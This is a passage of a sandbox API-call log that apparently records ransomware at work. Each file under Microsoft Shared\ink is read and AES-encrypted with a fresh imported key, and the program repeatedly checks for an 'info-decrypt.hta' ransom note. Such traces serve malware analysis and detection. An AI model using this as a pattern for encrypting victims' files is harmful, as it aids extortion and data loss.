hKey=0xb7f890, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7fb10) returned 1 [0211.927] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.927] CryptSetKeyParam (hKey=0xb7fb10, dwParam=0x4, pbData=0x3701b9c*=0x1, dwFlags=0x0) returned 1 [0211.927] CryptSetKeyParam (hKey=0xb7fb10, dwParam=0x1, pbData=0x3701b68, dwFlags=0x0) returned 1 [0211.933] CryptEncrypt (in: hKey=0xb7fb10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x15e51778*, pdwDataLen=0x6d8ed78*=0xe2810, dwBufLen=0xe2810 | out: pbData=0x15e51778*, pdwDataLen=0x6d8ed78*=0xe2810) returned 1 [0211.996] CryptEncrypt (in: hKey=0xb7fb10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3701bc4*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x3701bc4*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0211.997] CryptDestroyKey (hKey=0xb7f890) returned 1 [0211.997] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0211.997] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0211.997] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", lpFilePart=0x0) returned 0x4a [0211.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0211.997] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0211.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8db20) returned 1 [0211.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", lpFilePart=0x0) returned 0x42 [0211.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", lpFilePart=0x0) returned 0x43 [0211.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0211.999] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bc7aa0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x35bc7aa0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x35bc7aa0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0211.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0211.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", lpFilePart=0x0) returned 0x42 [0211.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0211.999] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), fInfoLevelId=0x0, lpFileInformation=0x3702a14 | out: lpFileInformation=0x3702a14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ece8572, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2ece8572, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2ea60e45, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb620)) returned 1 [0212.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0212.000] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", lpFilePart=0x0) returned 0x42 [0212.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0212.000] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0212.000] GetFileType (hFile=0x4a8) returned 0x1 [0212.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0212.000] GetFileType (hFile=0x4a8) returned 0x1 [0212.000] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0xb620 [0212.001] ReadFile (in: hFile=0x4a8, lpBuffer=0x3705620, nNumberOfBytesToRead=0xb620, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x3705620*, lpNumberOfBytesRead=0x6d8edac*=0xb620, lpOverlapped=0x0) returned 1 [0212.003] CloseHandle (hObject=0x4a8) returned 1 [0212.003] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbe0470) returned 1 [0212.016] CryptGenRandom (in: hProv=0xbe0470, dwLen=0x10, pbBuffer=0x3711304 | out: pbBuffer=0x3711304) returned 1 [0212.589] CryptImportKey (in: hProv=0xbe0470, pbData=0x3683d10, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f250) returned 1 [0212.589] CryptContextAddRef (hProv=0xbe0470, pdwReserved=0x0, dwFlags=0x0) returned 1 [0212.589] CryptContextAddRef (hProv=0xbe0470, pdwReserved=0x0, dwFlags=0x0) returned 1 [0212.589] CryptDuplicateKey (in: hKey=0xb7f250, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7fa50) returned 1 [0212.589] CryptContextAddRef (hProv=0xbe0470, pdwReserved=0x0, dwFlags=0x0) returned 1 [0212.589] CryptSetKeyParam (hKey=0xb7fa50, dwParam=0x4, pbData=0x3683df0*=0x1, dwFlags=0x0) returned 1 [0212.589] CryptSetKeyParam (hKey=0xb7fa50, dwParam=0x1, pbData=0x3683dbc, dwFlags=0x0) returned 1 [0212.590] CryptEncrypt (in: hKey=0xb7fa50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3683e00*, pdwDataLen=0x6d8ed78*=0xb630, dwBufLen=0xb630 | out: pbData=0x3683e00*, pdwDataLen=0x6d8ed78*=0xb630) returned 1 [0212.590] CryptEncrypt (in: hKey=0xb7fa50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x368f454*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x368f454*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0212.592] CryptDestroyKey (hKey=0xb7f250) returned 1 [0212.592] CryptReleaseContext (hProv=0xbe0470, dwFlags=0x0) returned 1 [0212.592] CryptReleaseContext (hProv=0xbe0470, dwFlags=0x0) returned 1 [0212.592] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", lpFilePart=0x0) returned 0x42 [0212.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0212.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0212.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8db20) returned 1 [0212.594] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", lpFilePart=0x0) returned 0x3f [0212.594] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", lpFilePart=0x0) returned 0x43 [0212.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0212.594] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bc7aa0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x35bc7aa0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x35bc7aa0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0212.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0212.594] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", lpFilePart=0x0) returned 0x3f [0212.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0212.595] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat"), fInfoLevelId=0x0, lpFileInformation=0x3690264 | out: lpFileInformation=0x3690264*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f7eaa54, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2f7eaa54, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2f301d57, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb6710)) returned 1 [0212.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0212.780] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", lpFilePart=0x0) returned 0x3f [0212.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0212.780] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0212.780] GetFileType (hFile=0x31c) returned 0x1 [0212.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0212.780] GetFileType (hFile=0x31c) returned 0x1 [0212.780] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0xb6710 [0212.780] ReadFile (in: hFile=0x31c, lpBuffer=0x1639dba0, nNumberOfBytesToRead=0xb6710, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x1639dba0*, lpNumberOfBytesRead=0x6d8edac*=0xb6710, lpOverlapped=0x0) returned 1 [0212.788] CloseHandle (hObject=0x31c) returned 1 [0212.788] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbe11b8) returned 1 [0212.789] CryptGenRandom (in: hProv=0xbe11b8, dwLen=0x10, pbBuffer=0x36907a4 | out: pbBuffer=0x36907a4) returned 1 [0213.234] CryptImportKey (in: hProv=0xbe11b8, pbData=0x37aff9c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7fa50) returned 1 [0213.234] CryptContextAddRef (hProv=0xbe11b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0213.234] CryptContextAddRef (hProv=0xbe11b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0213.234] CryptDuplicateKey (in: hKey=0xb7fa50, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f290) returned 1 [0213.235] CryptContextAddRef (hProv=0xbe11b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0213.235] CryptSetKeyParam (hKey=0xb7f290, dwParam=0x4, pbData=0x37b007c*=0x1, dwFlags=0x0) returned 1 [0213.235] CryptSetKeyParam (hKey=0xb7f290, dwParam=0x1, pbData=0x37b0048, dwFlags=0x0) returned 1 [0213.237] CryptEncrypt (in: hKey=0xb7f290, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x164542d0*, pdwDataLen=0x6d8ed78*=0xb6720, dwBufLen=0xb6720 | out: pbData=0x164542d0*, pdwDataLen=0x6d8ed78*=0xb6720) returned 1 [0213.247] CryptEncrypt (in: hKey=0xb7f290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37b00a4*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x37b00a4*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0213.248] CryptDestroyKey (hKey=0xb7fa50) returned 1 [0213.248] CryptReleaseContext (hProv=0xbe11b8, dwFlags=0x0) returned 1 [0213.248] CryptReleaseContext (hProv=0xbe11b8, dwFlags=0x0) returned 1 [0213.248] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", lpFilePart=0x0) returned 0x3f [0213.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0213.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0213.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8db20) returned 1 [0213.250] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", lpFilePart=0x0) returned 0x3f [0213.250] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", lpFilePart=0x0) returned 0x43 [0213.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0213.250] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bc7aa0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x35bc7aa0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x35bc7aa0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0213.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0213.250] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", lpFilePart=0x0) returned 0x3f [0213.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0213.250] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), fInfoLevelId=0x0, lpFileInformation=0x37b0ea0 | out: lpFileInformation=0x37b0ea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33535c00, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x33535c00, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x332fa78d, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xc7240)) returned 1 [0213.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0213.251] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", lpFilePart=0x0) returned 0x3f [0213.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0213.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0213.251] GetFileType (hFile=0x32c) returned 0x1 [0213.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0213.251] GetFileType (hFile=0x32c) returned 0x1 [0213.251] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0xc7240 [0213.251] ReadFile (in: hFile=0x32c, lpBuffer=0x1650aa10, nNumberOfBytesToRead=0xc7240, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x1650aa10*, lpNumberOfBytesRead=0x6d8edac*=0xc7240, lpOverlapped=0x0) returned 1 [0213.368] CloseHandle (hObject=0x32c) returned 1 [0213.368] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbe0c68) returned 1 [0213.369] CryptGenRandom (in: hProv=0xbe0c68, dwLen=0x10, pbBuffer=0x37b13e0 | out: pbBuffer=0x37b13e0) returned 1 [0213.968] CryptImportKey (in: hProv=0xbe0c68, pbData=0x37b20cc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f090) returned 1 [0213.969] CryptContextAddRef (hProv=0xbe0c68, pdwReserved=0x0, dwFlags=0x0) returned 1 [0213.969] CryptContextAddRef (hProv=0xbe0c68, pdwReserved=0x0, dwFlags=0x0) returned 1 [0213.969] CryptDuplicateKey (in: hKey=0xb7f090, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f050) returned 1 [0213.969] CryptContextAddRef (hProv=0xbe0c68, pdwReserved=0x0, dwFlags=0x0) returned 1 [0213.969] CryptSetKeyParam (hKey=0xb7f050, dwParam=0x4, pbData=0x37b21ac*=0x1, dwFlags=0x0) returned 1 [0213.969] CryptSetKeyParam (hKey=0xb7f050, dwParam=0x1, pbData=0x37b2178, dwFlags=0x0) returned 1 [0213.972] CryptEncrypt (in: hKey=0xb7f050, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x165d1c70*, pdwDataLen=0x6d8ed78*=0xc7250, dwBufLen=0xc7250 | out: pbData=0x165d1c70*, pdwDataLen=0x6d8ed78*=0xc7250) returned 1 [0213.982] CryptEncrypt (in: hKey=0xb7f050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37b21d4*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x37b21d4*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0213.984] CryptDestroyKey (hKey=0xb7f090) returned 1 [0213.984] CryptReleaseContext (hProv=0xbe0c68, dwFlags=0x0) returned 1 [0213.984] CryptReleaseContext (hProv=0xbe0c68, dwFlags=0x0) returned 1 [0213.984] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", lpFilePart=0x0) returned 0x3f [0213.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0213.984] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0213.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8db20) returned 1 [0213.986] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", lpFilePart=0x0) returned 0x41 [0213.986] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta", lpFilePart=0x0) returned 0x43 [0213.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0213.987] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bc7aa0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x35bc7aa0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x35bc7aa0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0213.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0214.364] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", lpFilePart=0x0) returned 0x41 [0214.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0214.364] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), fInfoLevelId=0x0, lpFileInformation=0x3689cbc | out: lpFileInformation=0x3689cbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd661d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x32bd661d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x32a7f9d8, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x10ca50)) returned 1 [0214.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0214.364] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", lpFilePart=0x0) returned 0x41 [0214.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0214.365] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0214.365] GetFileType (hFile=0x31c) returned 0x1 [0214.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0214.365] GetFileType (hFile=0x31c) returned 0x1 [0214.365] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x10ca50 [0214.365] ReadFile (in: hFile=0x31c, lpBuffer=0x16698ee0, nNumberOfBytesToRead=0x10ca50, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x16698ee0*, lpNumberOfBytesRead=0x6d8edac*=0x10ca50, lpOverlapped=0x0) returned 1 [0214.419] CloseHandle (hObject=0x31c) returned 1 [0214.419] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbe0c68) returned 1 [0214.421] CryptGenRandom (in: hProv=0xbe0c68, dwLen=0x10, pbBuffer=0x368a57c | out: pbBuffer=0x368a57c) returned 1 [0215.069] CryptImportKey (in: hProv=0xbe0c68, pbData=0x3614658, 